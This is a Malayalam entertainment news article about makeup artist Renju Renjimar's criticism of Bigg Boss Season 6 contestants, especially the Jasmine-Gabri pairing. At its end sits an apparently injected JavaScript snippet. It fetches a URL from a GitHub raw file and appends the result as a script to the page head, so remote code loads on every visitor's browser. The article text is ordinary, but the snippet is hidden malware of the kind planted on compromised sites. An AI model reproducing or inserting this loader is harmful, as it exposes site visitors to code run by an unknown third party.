Home ENTERTAINMENT ‘ജാസ്മിൻ- ഗബ്രി കൂട്ടുകെട്ടിനെതിരെ രഞ്ചു രഞ്ജിമാർ’ : ബിഗ്ഗ് ബോസ്സ് സീസൺ 6

‘ജാസ്മിൻ- ഗബ്രി കൂട്ടുകെട്ടിനെതിരെ രഞ്ചു രഞ്ജിമാർ’ : ബിഗ്ഗ് ബോസ്സ് സീസൺ 6

ബിഗ്ഗ് ബോസ് സീസൺ സിക്സിനെതിരെ തുറന്നു നിലപാടുമായി രംഗത്ത് എത്തിയിരിക്കുകയാണ് മേക്കപ്പ് ആർട്ടിസ്റ്റ് രഞ്ചു രഞ്ജിമാർ. ജംഗോ സ്പേസ് എന്ന സോഷ്യൽ മീഡിയ പ്ലാറ്റ്ഫോമിനു നൽകിയ ഇൻറർവ്യൂവിൽ ആണ് താരം തന്റെ അഭിപ്രായങ്ങൾ തുറന്നു പറയുന്നത്. ജാസ്മിൻ ഗബ്രി കോംബോക്കെ എതിരെയാണ് കൂടുതലായും താരം വിമർശനങ്ങളും ഉന്നയിച്ചത്.ബിഗ് ബോസ് ഹൗസിൽ എത്തി വളരെ പെട്ടെന്ന് തന്നെ തമ്മിൽ റിലേഷണിലാണെന്ന് കാണിക്കാനുള്ള അവരുടെ ശ്രമം ആർട്ടിഫിഷ്യൽ ആണെന്നുള്ളത് പെട്ടെന്ന് തന്നെ ആളുകൾക്ക് മനസ്സിലാകും എന്ന് അവർ പറഞ്ഞു.ബിഗ് ബോസിലെ തന്റെ ഏറ്റവും പ്രിയപ്പെട്ട കോംമ്പോയാണ് പേർലി മാണി – ശ്രീനിജ്. എത്രോയോ ദിവസം എടുത്തതിന് ശേഷമാണ് അവർ അടുക്കുന്നത്. അപ്പോഴും അതിർ വരമ്പുകള്‍ ലംഘിക്കാത്ത തരത്തില്‍ മുന്നോട്ട് പോയി. അത് കാണുമ്പോള്‍ തന്നെ നമുക്ക് സന്തോഷമായിരുന്നു. എന്നാല്‍ ജാസ്മിന്റേയും ഗബ്രിയുടേയും കാര്യത്തില്‍ അങ്ങനെ അല്ല. ഇവരുടേത് പ്രണയമാണോ സുഹൃത്ത് ബന്ധമാണോ എന്നൊന്നും മനസ്സിലാകുന്നില്ല. ഇതൊക്കെയണെങ്കിലും ഗബ്രിയും ജാസ്മിനും കിടന്ന് കളിക്കുന്നുതുകൊണ്ട് പുറമെയുള്ള ആളുകള്‍ക്ക് ഇതെല്ലാം എന്തായി എന്ന് അറിയാനുള്ള ഒരു ക്യൂരിയോസിറ്റിയുണ്ട്. ഗെയിം അവർ കൊണ്ടുപോകുന്നുണ്ട്, റസ്മിനൊക്കെ ശരിക്കും പറഞ്ഞാല്‍ ഇവരെക്കൊണ്ട് ഗെയിം കളിപ്പിക്കുകയാണ്. അർജുനൊന്നും അവിടെ ഒന്നും ചെയ്യുന്നില്ല എന്നും താരം അഭിപ്രായപ്പെട്ടു.ബിഗ് ബോസിൽ ജെനിവിൻ ആയിട്ടുള്ളത് ജിന്റോ മാത്രം ആണെന്നാണ് രഞ്ജുവിന്റെ അഭിപ്രായം. അഭിഷേക് കുമാർ,അർജുൻ എന്നിവരൊന്നും ഹൗസിലെ യാതൊന്നും ചെയ്യുന്നില്ല അവരെല്ലാം കളിക്കാതെ വെറുതെ നോക്കി നിൽക്കുകയാണെന്നും അവർ കുറ്റപ്പെടുത്തി.ഋഷി ഒരു ശകുനി ആണെന്നും എന്തൊക്കെയായാലും ജാസ്മിൻ ബിഗ്ബോസിൽ നിന്നും പുറത്തു പോയാൽ കളിയുടെ തോത് വളരെ വലിയ രീതിയിൽ കുറയുമെന്നും രഞ്ജു പറയുന്നു.അഭിഷേക് ശ്രീകുമാർ ട്രാൻസ്‌ കമ്മ്യൂണിറ്റി ക്കെതിരെ നടത്തിയ പരാമർശങ്ങളെ രൂക്ഷമായി വിമർശിച്ച താരം, അദ്ദേഹം കപ്പ് നേടുന്നതിൽ തങ്ങൾ എതിരല്ല എന്നാൽ തങ്ങൾക്കെതിരെ നടത്തിയ പരാമർശങ്ങളിൽ ഖേദിക്കുന്നു എന്നും പറയുന്നു.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
Exit mobile version